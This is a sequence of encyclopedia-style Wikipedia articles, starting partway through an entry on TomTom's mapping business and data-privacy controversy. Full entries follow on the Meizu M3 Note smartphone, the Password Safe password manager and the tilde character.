local roads. Historic Speed Profiles are part of the digital map and are updated with every new map release. They give insight into real-world traffic patterns. This is a fact-based routing system based on measured travel times, compared to most other methods which use speed limits or ‘assumed’ speeds. In September 2008, map upgrade v8.10 was released for x20 series models, extending the IQ Routes feature to those devices with a free software update using TomTom Home. On the NAV3 and NAV4 models the IQ Routes feature is available by default on all map versions. Mapping TomTom worked with auto parts manufacturer Bosch, starting in 2015, to develop maps for use in self-driving vehicles. Bosch defined the specifications for TomTom maps to follow as they began first road-tests on U.S. highway I-280 and Germany's A81. TomTom commented at the time on the contrast in details required in those newly developed maps compared with earlier versions, specifically including "precision to the decimeter" and other complex data required to help a self-driving car "see" key road features as it travels. In 2015, TomTom was one of the only independent producers of digital maps that remained in the marketplace as they partnered with brands like Volkswagen to provide maps in the auto industry. The company also partnered with Uber in 2015, and extended the partnership further in 2020. Together the companies have worked to integrate TomTom maps and traffic data across the ridesharing app's platform. This lets Uber serve as a "trusted map editing partner", making it one of the first brands to join TomTom's Map Editing Partnership (MEP) program. As part of the MEP program, users provide feedback on road conditions as they encounter them so that live maps can be updated to reflect current conditions. The program estimates 3 million edits monthly by its partners globally. Apple has relied on licensed data from TomTom and others to fill in data gaps in its Maps app since launching it in 2012. In January 2020 Apple confirmed that it was no longer licensing data from TomTom and would rely on its own underlying Maps app framework going forward after a recent app update at the time. As of 2019, TomTom claimed to have 800 million people using its products across physical hardware and apps using TomTom technology. The same year, TomTom sold its telematics division, TomTom Telematics, to Japanese Bridgestone to prioritize business linked to its digital maps, as the brand shifted focus away from consumer devices to software services instead. In 2019, TomTom Telematics became Webfleet Solutions. The brand leveraged its real-time driving and parking data in collaboration with Microsoft and Moovit (a public transport data platform)in 2019, as well as struck map and navigation deals with auto industry tycoons like Nissan, Fiat Chrysler, Porsche, Lamborghini, and Bentley among others. Teaming up with the University of Amsterdam, the partners launched Atlas Lab, a research lab dedicated to AI development to support HD maps to be used in autonomous vehicles. TomTom has also been developing High Definition (HD) maps intended for use in autonomous cars to assist with environmental data where sensors are limited. The company announced in March 2019 that they would supply HD maps to "multiple top 10" auto manufacturers that would provide centimeter accuracy in representing terrain; and announced a new "map horizon" feature, allowing self-driving cars to simulate a virtual picture of the road ahead in real-time. The company partnered with Volvo the same year (2019) to build its own vehicle capable of "level 5" autonomy in hopes of further improving its maps technology. The Volvo XC90 included custom sensing equipment to provide data about the vehicle's surroundings that could be referenced against TomTom's HD maps. TomTom crowdsourced camera data through its partnership with Hella Aglaia, announced in September 2019, to feed into its real-time map updates for ongoing improvement to the new HD maps technology. In early 2020, TomTom publicly announced the recent closing of a deal with Huawei Technologies where Huawei would use TomTom's maps, data, and navigation tools to develop its own apps for use in Chinese smartphones. TomTom has collected a range of live and historical data since 2008, analysing data from a variety of sources including connected devices and its community of users. Additionally, TomTom's "MoMa" vehicles (short for mobile mapping) cover over 3 billion km annually, using both radar and LiDAR cameras to capture 375 million images annually to sense road changes that are then verified and used to update its maps. TomTom pairs this data with input from partnering brands to process around 2 billion map changes on average each month to keep maps current and reflective of existing road conditions. The brand puts out an updated map database commercially on a weekly basis. Controversy In April 2011, TomTom "apologized for supplying driving data collected from customers to police to use in catching speeding motorists". The company had collected data from its Dutch customers which Dutch police subsequently used to set targeted speed traps. As a result of this, TomTom was investigated by the Dutch Data Protection Authority, who found that TomTom had not contravened the . In 2011, TomTom improved the clarity of its explanation of how it uses the data it collects from its customers. In May 2011, the company announced that it was planning to sell aggregated customer information to the Roads & Traffic Authority of the Australian state of New South Wales, which could also potentially be used for targeted speed enforcement. The privacy implications of this announcement were widely reported, particularly the lack of anonymity and the potential to associate the data with individuals. The company's practice of selling its user data has been criticised by Electronic Frontiers Australia. David Vaile of the University of New South Wales' Cyberspace Law and Policy Centre has called for an independent technical analysis of the company's data collection practices. TomTom navigation devices collect user data that includes point of origin, point of destination, journey times, speeds and routes taken. The Australian Privacy Foundation said it would be easy to trace the data back to individual customers, even if TomTom claimed it used only aggregated, anonymous data. TomTom VP of Marketing Chris Kearney insisted the information was totally anonymous. In addition to this, he said TomTom never sold the information to Dutch authorities with speed cameras in mind, although Kearney would not rule out selling the user data for similar use in Australia. Such data is being purchased from various mapping companies by governments on a fairly regular basis. It is not known if governments use this data for purposes other than the placement of speed cameras, such as to improve the road network, introduce traffic lights or find accident hotspots. Competition TomTom's main retail car satellite navigation competitors are MiTAC (Navman and Magellan Navigation) and Garmin. TomTom's main autonomous driving HD maps competitor is Here, which is owned by a consortium of German automotive companies including Audi, BMW, and Daimler. See also Comparison of commercial GPS software References External links TomTom Open-Source Manufacturing companies based in Amsterdam Electronics companies of the Netherlands Satellite navigation Electronics companies established in 1991 Dutch brands Multinational companies headquartered in the Netherlands Navigation system companies Self-driving cars Automotive navigation systems
51364576
https://en.wikipedia.org/wiki/Meizu%20M3%20Note
Meizu M3 Note
The Meizu M3 Note is a smartphone designed and produced by the Chinese manufacturer Meizu, which runs on Flyme OS, Meizu's modified Android operating system. It is a current phablet model of the M series, succeeding the Meizu M2 Note. It was unveiled on April 6, 2016 in Beijing. History Initial rumors appeared in March 2016 after a possible specification sheet had been leaked, stating that the upcoming device would most likely feature a MediaTek Helio P10 System on a chip, a Full HD display and a 4100 mAh battery. On March 22, Meizu founder Jack Wong mentioned that the M3 Note was about to launch soon. The following day, Meizu confirmed that the launch event for the Meizu M3 Note will take place in Beijing on April 6, 2016. The new device was later sighted on the AnTuTu benchmark, confirming the speculations that it will be powered by a MediaTek Helio P10 SoC. On April 4, 2016, Meizu released a teaser for the product launch, confirming that the coming device would feature an all-metal body. Release As announced, the M3 Note was released in Beijing on April 6, 2016. Pre-orders for the M3 Note began after the launch event on April 6, 2016. Sales began on April 30, 2016 in mainland China and on May 11, 2016 in India. Features Flyme The Meizu M3 Note was released with an updated version of Flyme OS, a modified operating system based on Android Lollipop. It features an alternative, flat design and improved one-handed usability. Hardware and design The Meizu M3 Note features a MediaTek Helio P10 system-on-a-chip with an array of eight ARM Cortex-A53 CPU cores, an ARM Mali-T860 MP2 GPU and 2 GB or 3 GB of RAM. The M3 Note reaches a score of 50,000 points on the AnTuTu benchmark and is therefore approximately 56% faster than its predecessor, the Meizu M2 Note. The M3 Note is available in three different colors (grey, silver and champagne gold) and comes with either 2 GB of RAM and 16 GB of internal storage or 3 GB of RAM and 32 GB of internal storage. Unlike its predecessor, the Meizu M3 Note has a full-metal body, which measures x x and weighs . It has a slate form factor, being rectangular with rounded corners and has only one central physical button at the front. Unlike most other Android smartphones, the M3 Note doesn't have capacitive buttons nor on-screen buttons. The functionality of these keys is implemented using a technology called mBack, which makes use of gestures with the physical button. The M3 Note further extends this button by a fingerprint sensor called mTouch. The M3 Note features a fully laminated 5.5-inch LTPS multi-touch capacitive touchscreen display with a FHD resolution of 1080 by 1920 pixels. The pixel density of the display is 403 ppi. In addition to the touchscreen input and the front key, the device has volume/zoom control buttons and the power/lock button on the right side, a 3.5mm TRS audio jack on the top and a microUSB (Micro-B type) port on the bottom for charging and connectivity. The Meizu M3 Note has two cameras. The rear camera has a resolution of 13 MP, a ƒ/2.2 aperture, a 5-element lens, phase-detection autofocus and an LED flash. The front camera has a resolution of 5 MP, a ƒ/2.0 aperture and a 5-element lens. Reception The M3 Note received generally positive reviews. Android Authority gave the M3 Note a rating of 8.2 out of 10 possible points and concluded that “the Meizu M3 Note packs a very large punch for its price”. Furthermore, the build quality, battery life and the good display were praised. Huffington Post stated that the Meizu M3 Note is “[an] affordable and highly functional Android smartphone, with a large HD screen, great design and impressive battery life”. Android Headlines also reviewed the device and concluded that “[the] overall fantastic performance and just a great experience in general make the Meizu M3 Note an easy recommendation for sure”. TechSpot gave the M3 Note a rating of 7.5 out of 10 possible points and noted that “the M3 Note could be a great budget smartphone purchase”. See also Meizu Meizu M2 Note Comparison of smartphones References External links Official product page Meizu Android (operating system) devices Mobile phones introduced in 2016 Meizu smartphones Discontinued smartphones
1846387
https://en.wikipedia.org/wiki/Password%20Safe
Password Safe
Password Safe is a free and open-source password manager program originally written for Microsoft Windows but supporting wide area of operating systems with compatible clients available for Linux, FreeBSD, Android, IOS, BlackBerry and other operating systems as well. The Linux version is available for Ubuntu (including the Kubuntu and Xubuntu derivatives) and Debian. A Java-based version is also available on SourceForge. On its page, users can find links to unofficial releases running under Android, BlackBerry, and other mobile operating systems. History The program was initiated by Bruce Schneier at Counterpane Systems, and is now hosted on SourceForge (Windows) and GitHub (Linux) and developed by a group of volunteers. Design After filling in the master password the user has access to all account data entered and saved previously. The data can be organized by categories, searched, and sorted based on references which are easy for the user to remember. There are various key combinations and mouse clicks to copy parts of the stored data (password, email, username etc.), or use the autofill feature (for filling forms). The program can be set to minimize automatically after a period of idle time and clears the clipboard. It is possible to compare and synchronize (merge) two different password databases. The program can be set up to generate automatic backups. Password Safe does not support database sharing, but the single-file database can be shared by any external sharing method (for example Syncthing, Dropbox etc.). Database is not stored online. Features Note: All uncited information in this section is sourced from the official Help file included with the application Password management Stored passwords can be sectioned into groups and subgroups in a tree structure. Changes to entries can be tracked, including a history of previous passwords, the creation time, modification time, last access time, and expiration time of each password stored. Text notes can be entered with the password details. Import and export The password list can be exported to various file formats including TXT, XML and previous versions of Password Safe. Password Safe also supports importing these files Password Safe supports importing TXT and CSV files which were exported from KeePass version 1.x (V1). KeePass version 2.x (V2) allows databases to be exported as a KeePass V1 database, which in turn can be imported to Password Safe. Password Safe cannot directly import an XML file exported by KeePass V1 or V2, as the fields are too different. However, the Help file provides instructions for processing an exported XML file with one of multiple XSLT files (included with Password Safe) which will produce a Password Safe compatible XML file that can then be imported. File encryption Password Safe can encrypt any file using a key derived from a passphrase provided by the user through the command-line interface. Password generator The software features a built-in password generator that generates random passwords. The user may also designate parameters for password generation (length, character set, etc.), creating a "Named Password Policy" by which different passwords can be created. Cryptography The original Password Safe was built on Bruce Schneier's Blowfish encryption algorithm. Rony Shapiro implemented Twofish encryption along with other improvements to the 3.xx series of Password Safe. The keys are derived using an equivalent of PBKDF2 with SHA-256 and a configurable number of iterations, currently set at 2048. In a paper analysing various database formats of password storage programs for security vulnerabilities the researchers have found that the format used by Password Safe (version 3 format) was the most resistant to various cryptographic attacks. Reception Reviewers have highlighted the program's simplicity as its best feature. See also List of password managers Password manager References External links Password Safe at FileHare.com Password Safe at Schneier.com pwSafe Password Safe clone for OS X and iOS Password Safe at Softonline.net Cryptographic software PIM-software for Windows Linux software Java platform software Free password managers Portable software Software that uses wxWidgets 2002 software Free software programmed in C++ Freeware Free and open-source Android software
212390
https://en.wikipedia.org/wiki/Tilde
Tilde
The tilde (), or , is a grapheme with several uses. The name of the character came into English from Spanish and Portuguese, which in turn came from the Latin titulus, meaning "title" or "superscription". Its primary use is as a diacritic (accent) in combination with a base letter but, for historical reasons, it also is used in standalone form in a variety of contexts. History Use by medieval scribes The tilde was originally written over an omitted letter or several letters as a scribal abbreviation, or "mark of suspension" and "mark of contraction", shown as a straight line when used with capitals. Thus, the commonly used words Anno Domini were frequently abbreviated to Ao Dñi, with an elevated terminal with a suspension mark placed over the "n". Such a mark could denote the omission of one letter or several letters. This saved on the expense of the scribe's labour and the cost of vellum and ink. Medieval European charters written in Latin are largely made up of such abbreviated words with suspension marks and other abbreviations; only uncommon words were given in full. The text of the Domesday Book of 1086, relating for example, to the manor of Molland in Devon (see adjacent picture), is highly abbreviated as indicated by numerous tildes. The text with abbreviations expanded is as follows: Role of mechanical typewriters The incorporation of the tilde into ASCII is a direct result of its appearance as a distinct character on Portuguese mechanical typewriters in the late nineteenth century. This symbol did not exist independently as a type or hot-lead printing character. On typewriters designed for languages that routinely use diacritics (accent marks), a dead key mechanism was provided: a mark is made when a dead key is typed but, unlike normal keys, the paper carriage does not move on. To achieve an accented letter, the typist first typed the desired diacritic, then typed the letter to be accented. Since the diacritic key a 'dead key' had not moved the paper on, the letter was printed under the previously-printed accent. To add a diacritic to a capital letter on some typewriters, the upper-case [elevated] version of the accent could be produced using plus the diacritic key. On others, however, the typebar had two different diacritics so that users could only add accents to lower-case letters without manual intervention or other adjustment. For most Western European languages, the only diacritics used are acute (), grave (, circumflex () and diaeresis (or umlaut, ): early typewriters for the European market included these as dead keys. Spanish and Portuguese uniquely use the tilde diacritic. In modern Spanish, the tilde accent is needed only for the characters and . Both were precomposed as distinct graphemes and assigned to a single typebar, which sacrificed a key that was felt to be less important, usually the key. Portuguese, however, has two: and . Whereas it was just about possible to find one low-use key to sacrifice for Spanish, to find two sacrificial keys for Portuguese was impractical. Instead a single key was changed to a tilde dead key and was born as a distinct grapheme. The centralized ASCII tilde ASCII incorporated many of the overprinting lower-case diacritics from typewriters, including tilde. Overprinting was intended to work by putting a backspace code between the codes for letter and diacritic. However even at that time, mechanisms that could do this or any other overprinting were not widely available, did not work for capital letters, and were impossible on video displays, with the result that this concept failed to gain significant acceptance. Consequently, many of these diacritics (and the underscore) were quickly reused by software as additional syntax, basically becoming new types of syntactic symbols that a programming language could use. As this usage became predominant, type design gradually evolved so these diacritic characters became larger and more vertically centered, making them useless as overprinted diacritics but much easier to read as free-standing characters that had come to be used for entirely different and novel purposes. Typography and lexicography called a similar shaped mark the swung dash, , are used in dictionaries to indicate the omission of the entry word. Connection to Spanish As indicated by the etymological origin of the word "tilde" in English, this symbol has been closely associated with the Spanish language. The connection stems from the use of the tilde above the letter to form the (different) letter in Spanish, a feature shared by only a few other languages, most of which are historically connected to Spanish. This peculiarity can help non-native speakers quickly identify a text as being written in Spanish with little chance of error. In addition, most native speakers, although not all, use the word to refer to their language. Particularly during the 1990s, Spanish-speaking intellectuals and news outlets demonstrated support for the language and the culture by defending this letter against globalisation and computerisation trends that threatened to remove it from keyboards and other standardised products and codes. The Instituto Cervantes, founded by Spain's government to promote the Spanish language internationally, chose as its logo a highly stylised with a large tilde. The 24-hour news channel CNN in the US later adopted a similar strategy on its existing logo for the launch of its Spanish-language version. And similarly to the National Basketball Association (NBA), the Spain men's national basketball team is nicknamed "ÑBA". In Spanish itself the word is used more generally for diacritics, including the stress-marking acute accent. The diacritic is more commonly called or , and is not considered an accent mark in Spanish, but rather simply a part of the letter (much like the dot over makes an character that is familiar to readers of English). Usage Common use in English The English language does not use the tilde as a diacritic. The standalone form of the symbol is used more widely. Informally, it means "approximately", "about", or "around", such as "~30 minutes before", meaning "approximately 30 minutes before". It can mean "similar to", including "of the same order of magnitude as", such as "" meaning that and are of the same order of magnitude. Another approximation symbol is the double tilde , meaning "approximately equal to". The tilde is also used to indicate congruence of shapes by placing it over an symbol, thus . In Japanese it is used in to indicate a range or interval: 5〜10 means between 5 and 10. In the computing field, especially in Unix-based systems, the tilde indicates the user's home directory. In more recent digital usage, tildes on either side of a word or phrase have sometimes come to convey a particular tone that "let[s] the enclosed words perform both sincerity and irony", which can pre-emptively defuse a negative reaction. For example, BuzzFeed journalist Joseph Bernstein interprets the tildes in the following tweet: "in the ~ spirit of the season ~ will now link to some of the (imho) #Bestof2014 sports reads. if you hate nice things, mute that hashtag." as a way of making it clear that both the author and reader are aware that the enclosed phrase – "spirit of the season" – "is cliche and we know this quality is beneath our author, and we don't want you to think our author is a cliche person generally". Diacritical use In some languages, the tilde is a diacritic mark placed over a letter to indicate a change in its pronunciation: Pitch The tilde was firstly used in the polytonic orthography of Ancient Greek, as a variant of the circumflex, representing a rise in pitch followed by a return to standard pitch. Abbreviation Later, it was used to make abbreviations in medieval Latin documents. When an or followed a vowel, it was often omitted, and a tilde (physically, a small ) was placed over the preceding vowel to indicate the missing letter; this is the origin of the use of tilde to indicate nasalization (compare the development of the umlaut as an abbreviation of .) The practice of using the tilde over a vowel to indicate omission of an or continued in printed books in French as a means of reducing text length until the 17th century. It was also used in Portuguese, and Spanish. The tilde was also used occasionally to make other abbreviations, such as over the letter , making , to signify the word que ("that"). Nasalization It is also as a small that the tilde originated when written above other letters, marking a Latin which had been elided in old Galician-Portuguese. In modern Portuguese it indicates nasalization of the base vowel: "hand", from Lat. manu-; "reasons", from Lat. . This usage has been adopted in the orthographies of several native languages of South America, such as Guarani and Nheengatu, as well as in the International Phonetic Alphabet (IPA) and many other phonetic alphabets. For example, is the IPA transcription of the pronunciation of the French place-name Lyon. In Breton, the symbol after a vowel means that the letter serves only to give the vowel a nasalised pronunciation, without being itself pronounced, as it normally is. For example, gives the pronunciation whereas gives . In the DMG romanization of Tunisian Arabic, the tilde is used for nasal vowels õ and ṏ. Palatal n The tilded (, ) developed from the digraph in Spanish. In this language, is considered a separate letter called eñe (), rather than a letter-diacritic combination; it is placed in Spanish dictionaries between the letters and . In Spanish, the word tilde actually refers to diacritics in general, e.g. the acute accent in José, while the diacritic in is called "virgulilla" (). Current languages in which the tilded () is used for the palatal nasal consonant include Asturian Aymara Basque Chamorro Filipino Galician Guaraní Iñupiaq Mapudungun Papiamento Quechua Spanish Tetum Wolof Tone In Vietnamese, a tilde over a vowel represents a creaky rising tone (ngã). Letters with the tilde are not considered separate letters of the Vietnamese alphabet. International Phonetic Alphabet In phonetics, a tilde is used as a diacritic that is placed above a letter, below it or superimposed onto the middle of it: A tilde above a letter indicates nasalization, e.g. . A tilde superimposed onto the middle of a letter indicates velarization or pharyngealization, e.g. . If no precomposed Unicode character exists, the Unicode character can be used to generate one. A tilde below a letter indicates laryngealisation, e.g. . If no precomposed Unicode character exists, the Unicode character can be used to generate one. Letter extension In Estonian, the symbol stands for the close-mid back unrounded vowel, and it is considered an independent letter. Other uses Some languages and alphabets use the tilde for other purposes: Arabic script: A symbol resembling the tilde () is used over the letter () to become , denoting a long sound. Guaraní: The tilded (note that with tilde is not available as a precomposed glyph in Unicode) stands for the velar nasal consonant. Also, the tilded () stands for the nasalized upper central rounded vowel . Munduruku, Parintintín, and two older spellings of Filipino words also use . Syriac script: A tilde (~) under the letter Kaph represents a sound, transliterated as ch or č. Estonian and Võro use the tilde above the letter o (õ) to indicate the vowel , a rare sound among languages. Unicode has a combining vertical tilde character: . It is used to indicate middle tone in linguistic transcription of certain dialects of the Lithuanian language. Punctuation The tilde is used in various ways in punctuation: Range In some languages (though not generally in English), a tilde-like wavy dash may be used as punctuation (instead of an unspaced hyphen, en dash or em dash) between two numbers, to indicate a range rather than subtraction or a hyphenated number (such as a part number or model number). For example, "12~15" means "12 to 15", "~3" means "up to three", and "100~" means "100 and greater". East Asian languages almost always use this convention, but it is often done for clarity in some other languages as well. Chinese uses the wavy dash and full-width em dash interchangeably for this purpose. In English, the tilde is often used to express ranges and model numbers in electronics, but rarely in formal grammar or in type-set documents, as a wavy dash preceding a number sometimes represents an approximation (see below). Approximation Before a number the tilde can mean 'approximately'; '~42' means 'approximately 42'. When used with currency symbols that precede the number (national conventions differ), the tilde precedes the symbol, thus for example '~$10' means 'about ten dollars'. The symbols ≈ (almost equal to) and ≅ (approximately equal to) are among the other symbols used to express approximation. Japanese The is used for various purposes in Japanese, including to denote ranges of numbers, in place of dashes or brackets, and to indicate origin. The wave dash is also used to separate a title and a subtitle in the same line, as a colon is used in English. When used in conversations via email or instant messenger it may be used as a sarcasm mark. The sign is used as a replacement for the , katakana character, in Japanese, extending the final syllable. Unicode and Shift JIS encoding of wave dash In practice the (Unicode ), is often used instead of the (Unicode ), because the Shift JIS code for the wave dash, 0x8160, which should be mapped to U+301C, is instead mapped to U+FF5E in Windows code page 932 (Microsoft's code page for Japanese), a widely used extension of Shift JIS. This decision avoided a shape definition error in the original (6.2) Unicode code charts: the wave dash reference glyph in JIS / Shift JIS matches the Unicode reference glyph for U+FF5E , while the original reference glyph for U+301C was reflected, incorrectly, when Unicode imported the JIS wave dash. In other platforms such as the classic Mac OS and macOS, 0x8160 is correctly mapped to U+301C. It is generally difficult, if not impossible, for users of Japanese Windows to type U+301C, especially in legacy, non-Unicode applications. A similar situation exists regarding the Korean KS X 1001 character set, in which Microsoft maps the EUC-KR or UHC code for the wave dash (0xA1AD) to , while IBM and Apple map it to U+301C. Microsoft also uses U+FF5E to map the KS X 1001 raised tilde (0xA2A6), while Apple uses . The current Unicode reference glyph for U+301C has been corrected to match the JIS standard in response to a 2014 proposal, which noted that while the existing Unicode reference glyph had been matched by fonts from the discontinued Windows XP, all other major platforms including later versions of Microsoft Windows shipped with fonts matching the JIS reference glyph for U+301C. The JIS / Shift JIS wave dash is still formally mapped to U+301C as of JIS X 0213, whereas the WHATWG Encoding Standard used by HTML5 follows Microsoft in mapping 0x8160 to U+FF5E. These two code points have a similar or identical glyph in several fonts, reducing the confusion and incompatibility. Mathematics As a unary operator A tilde in front of a single quantity can mean "approximately", "about" or "of the same order of magnitude as." In written mathematical logic, the tilde represents negation: "~p" means "not p", where "p" is a proposition. Modern use often replaces the tilde with the negation symbol (¬) for this purpose, to avoid confusion with equivalence relations. As a relational operator In mathematics, the tilde operator (Unicode U+223C), sometimes called "twiddle", is often used to denote an equivalence relation between two objects. Thus "" means " is equivalent to ". It is a weaker statement than stating that equals . The expression "" is sometimes read aloud as " twiddles ", perhaps as an analogue to the verbal expression of "". The tilde can indicate approximate equality in a variety of ways. It can be used to denote the asymptotic equality of two functions. For example, means that . A tilde is also used to indicate "approximately equal to" (e.g. 1.902 ~= 2). This usage probably developed as a typed alternative to the libra symbol used for the same purpose in written mathematics, which is an equal sign with the upper bar replaced by a bar with an upward hump, bump, or loop in the middle (︍︍♎︎) or, sometimes, a tilde (≃). The symbol "≈" is also used for this purpose. In physics and astronomy, a tilde can be used between two expressions (e.g. ) to state that the two are of the same order of magnitude. In statistics and probability theory, the tilde means "is distributed as"; see random variable(e.g. X ~ B(n,p) for a binomial distribution). A tilde can also be used to represent geometric similarity (e.g. , meaning triangle is similar to ). A triple tilde (≋) is often used to show congruence, an equivalence relation in geometry. As an accent The symbol "" is pronounced as "eff tilde" or, informally, as "eff twiddle" or, in American English, "eff wiggle". This can be used to denote the Fourier transform of f, or a lift of f, and can have a variety of other meanings depending on the context. A tilde placed below a letter in mathematics can represent a vector quantity (e.g. ). In statistics and probability theory, a tilde placed on top of a variable is sometimes used to represent the median of that variable; thus would indicate the median of the variable . A tilde over the letter n () is sometimes used to indicate the harmonic mean. In machine learning, a tilde may represent a candidate value for a cell state in GRUs or LSTM units. (e.g. c̃) Physics Often in physics, one can consider an equilibrium solution to an equation, and then a perturbation to that equilibrium. For the variables in the original equation (for instance ) a substitution can be made, where is the equilibrium part and is the perturbed part. A tilde is also used in particle physics to denote the hypothetical supersymmetric partner. For example, an electron is referred to by the letter e, and its superpartner the selectron is written ẽ. Economics For relations involving preference, economists sometimes use the tilde to represent indifference between two or more bundles of goods. For example, to say that a consumer is indifferent between bundles x and y, an economist would write x ~ y. Electronics It can approximate the sine wave symbol (∿, U+223F), which is used in electronics to indicate alternating current, in place of +, −, or ⎓ for direct current. Linguistics The tilde may indicate alternating allomorphs or morphological alternation, as in for kneel~knelt (the plus sign '+' indicates a morpheme boundary). The tilde may represent some sort of phonetic or phonemic variation between two sounds, which might be allophones or in free variation. For example, can represent "either or ". In formal semantics, it is also used as a notation for the squiggle operator which plays a key role in many theories of focus. Computing Computer programmers use the tilde in various ways and sometimes call the symbol (as opposed to the diacritic) a squiggle, squiggly, swiggle, or twiddle. According to the Jargon File, other synonyms sometimes used in programming include not, approx, wiggle, enyay (after eñe) and (humorously) sqiggle . Directories and URLs On Unix-like operating systems (including AIX, BSD, Linux and macOS), tilde normally indicates the current user's home directory. For example, if the current user's home directory is , then the command is equivalent to , , or . This convention derives from the Lear-Siegler ADM-3A terminal in common use during the 1970s, which happened to have the tilde symbol and the word "Home" (for moving the cursor to the upper left) on the same key. When prepended to a particular username, the tilde indicates that user's home directory (e.g., for the home directory of user , such as ). Used in URLs on the World Wide Web, it often denotes a personal website on a Unix-based server. For example, might be the personal website of John Doe. This mimics the Unix shell usage of the tilde. However, when accessed from the web, file access is usually directed to a subdirectory in the user's home directory, such as or . In URLs, the characters (or ) may substitute for a tilde if an input device lacks a tilde key. Thus, and will behave in the same manner. Computer languages The tilde is used in the AWK programming language as part of the pattern match operators for regular expressions: variable ~ /regex/ returns true if the variable is matched. variable !~ /regex/ returns false if the variable is matched. A variant of this, with the plain tilde replaced with =~, was adopted in Perl, and this semi-standardization has led to the use of these operators in other programming languages, such as Ruby or the SQL variant of the database PostgreSQL. In APL and MATLAB, tilde represents the monadic logical function NOT, and in APL it additionally represents the dyadic multiset function without (set difference). In C the tilde character is used as bitwise NOT unary operator, following the notation in logic (an ! causes a logical NOT, instead). This is also used by most languages based on or influenced by C, such as C++, D and C#. The MySQL database also use tilde as bitwise invert as does Microsoft's SQL Server Transact-SQL (T-SQL) language. JavaScript also uses tilde as bitwise NOT, and because JavaScript internally uses floats and the bitwise complement only works on integers, numbers are stripped of their decimal part before applying the operation. This has also given rise to using two tildes ~~x as a short syntax for a cast to integer (numbers are stripped of their decimal part and changed into their complement, and then back). In C++ and C#, the tilde is also used as the first character in a class's method name (where the rest of the name must be the same name as the class) to indicate a destructor – a special method which is called at the end of the object's life. In ASP.NET application tilde ('~') is used as a shortcut to the root of the application's virtual directory. In the CSS stylesheet language, the tilde is used for the indirect adjacent combinator as part of a selector. In the D programming language, the tilde is used as an array concatenation operator, as well as to indicate an object destructor and bitwise not operator. Tilde operator can be overloaded for user types, and binary tilde operator is mostly used to merging two objects, or adding some objects to set of objects. It was introduced because plus operator can have different meaning in many situations. For example, what to do with "120" + "14" ? Is this a string "134" (addition of two numbers), or "12014" (concatenation of strings) or something else? D disallows + operator for arrays (and strings), and provides separate operator for concatenation (similarly PHP programming language solved this problem by using dot operator for concatenation, and + for number addition, which will also work on strings containing numbers). In Eiffel, the tilde is used for object comparison. If a and b denote objects, the boolean expression a ~ b has value true if and only if these objects are equal, as defined by the applicable version of the library routine is_equal, which by default denotes field-by-field object equality but can be redefined in any class to support a specific notion of equality. If a and b are references, the object equality expression a ~ b is to be contrasted with a = b which denotes reference equality. Unlike the call a.is_equal (b), the expression a ~ b is type-safe even in the presence of covariance. In the Apache Groovy programming language the tilde character is used as an operator mapped to the bitwiseNegate() method. Given a String the method will produce a java.util.regex.Pattern. Given an integer it will negate the integer bitwise like in C. =~ and ==~ can in Groovy be used to match a regular expression. In Haskell, the tilde is used in type constraints to indicate type equality. Also, in pattern-matching, the tilde is used to indicate a lazy pattern match. In the Inform programming language, the tilde is used to indicate a quotation mark inside a quoted string. In "text mode" of the LaTeX typesetting language a tilde diacritic can be obtained using, e.g., \~{n}, yielding "ñ". A stand-alone tilde can be obtained by using \textasciitilde or \string~. In "math mode" a tilde diacritic can be written as, e.g., \tilde{x}. For a wider tilde \widetilde can be used. The \sim command produce a tilde-like binary relation symbol that is often used in mathematical expressions, and the double-tilde ≈ is obtained with \approx. The url package also supports entering tildes directly, e.g., \url{http://server/~name}. In both text and math mode, a tilde on its own (~) renders a white space with no line breaking. In MediaWiki syntax, four tildes are used as a shortcut for a user's signature. In Common Lisp, the tilde is used as the prefix for format specifiers in format strings. In Max/MSP, a tilde is used to denote objects that process at the computer's sampling rate, i.e. mainly those that deal with sound. In Standard ML, the tilde is used as the prefix for negative numbers and as the unary negation operator. In OCaml, the tilde is used to specify the label for a labeled parameter. In R, the tilde operator is used to separate the left- and right-hand sides in a model formula. In Object REXX, the twiddle is used as a "message send" symbol. For example, Employee.name~lower() would cause the lower() method to act on the object Employee's name attribute, returning the result of the operation. ~~ returns the object that received the method rather than the result produced. Thus it can be used when the result need not be returned or when cascading methods are to be used. team~~insert("Jane")~~insert("Joe")~~insert("Steve") would send multiple concurrent insert messages, thus invoking the insert method three consecutive times on the team object. In Raku, is used instead of for a regular expression. Backup filenames The dominant Unix convention for naming backup copies of files is appending a tilde to the original file name. It originated with the Emacs text editor and was adopted by many other editors and some command-line tools. Emacs also introduced an elaborate numbered backup scheme, with files named , and so on. It didn't catch on, as the rise of version control software eliminates the need for this usage. Microsoft filenames The tilde was part of Microsoft's filename mangling scheme when it extended the FAT file system standard to support long filenames for Microsoft Windows. Programs written prior to this development could only access filenames in the so-called 8.3 format—the filenames consisted of a maximum of eight characters from a restricted character set (e.g. no spaces), followed by a period, followed by three more characters. In order to permit these legacy programs to access files in the FAT file system, each file had to be given two names—one long, more descriptive one, and one that conformed to the 8.3 format. This was accomplished with a name-mangling scheme in which the first six characters of the filename are followed by a tilde and a digit. For example, "" might become "". The tilde symbol is also often used to prefix hidden temporary files that are created when a document is opened in Windows. For example, when a document "Document1.doc" is opened in Word, a file called "~$cument1.doc" is created in the same directory. This file contains information about which user has the file open, to prevent multiple users from attempting to change a document at the same time. Juggling notation In the juggling notation system Beatmap, tilde can be added to either "hand" in a pair of fields to say "cross the arms with this hand on top". Mills Mess is thus represented as (~2x,1)(1,2x)(2x,~1)*. Unicode The following letters exist that use the tilde as a diacritic as precomposed or combining Unicode characters: Unicode has code-points for many forms of non-combined tilde, for symbols incorporating tildes, and for characters visually similar to a tilde: ASCII tilde (U+007E) Most modern fonts align the plain ASCII spacing tilde at the same level as dashes, or only slightly upper. This makes it useless for the tilde's original purpose on typewriters, which was to overprint above a character as a diacritic, but does make modern use as an operator easier to read. Some monospace fonts do raise the tilde. On older printers which could overprint the tilde was often raised to allow it's use as a diacritic. An always-raised small tilde  was introduced with Windows-1252 to allow reproduction of older text appearance. Keyboards Where a tilde is on the keyboard depends on the computer's language settings according to the following chart. On many keyboards it is primarily available through a dead key that makes it possible to produce a variety of precomposed characters with the diacritic. In that case, a single tilde can typically be inserted with the dead key followed by the space bar, or alternatively by striking the dead key twice in a row. To insert a tilde with the dead key, it is often necessary to simultaneously hold down the Alt Gr key. With a Macintosh either of the Alt/Option keys function similarly. In the US and European Windows systems, the Alt code for a single tilde is 126. See also Circumflex Tittle Double tilde (disambiguation) Notes References Latin-script diacritics Punctuation Typographical symbols Greek-script diacritics Logic symbols Mathematical symbols
1050544
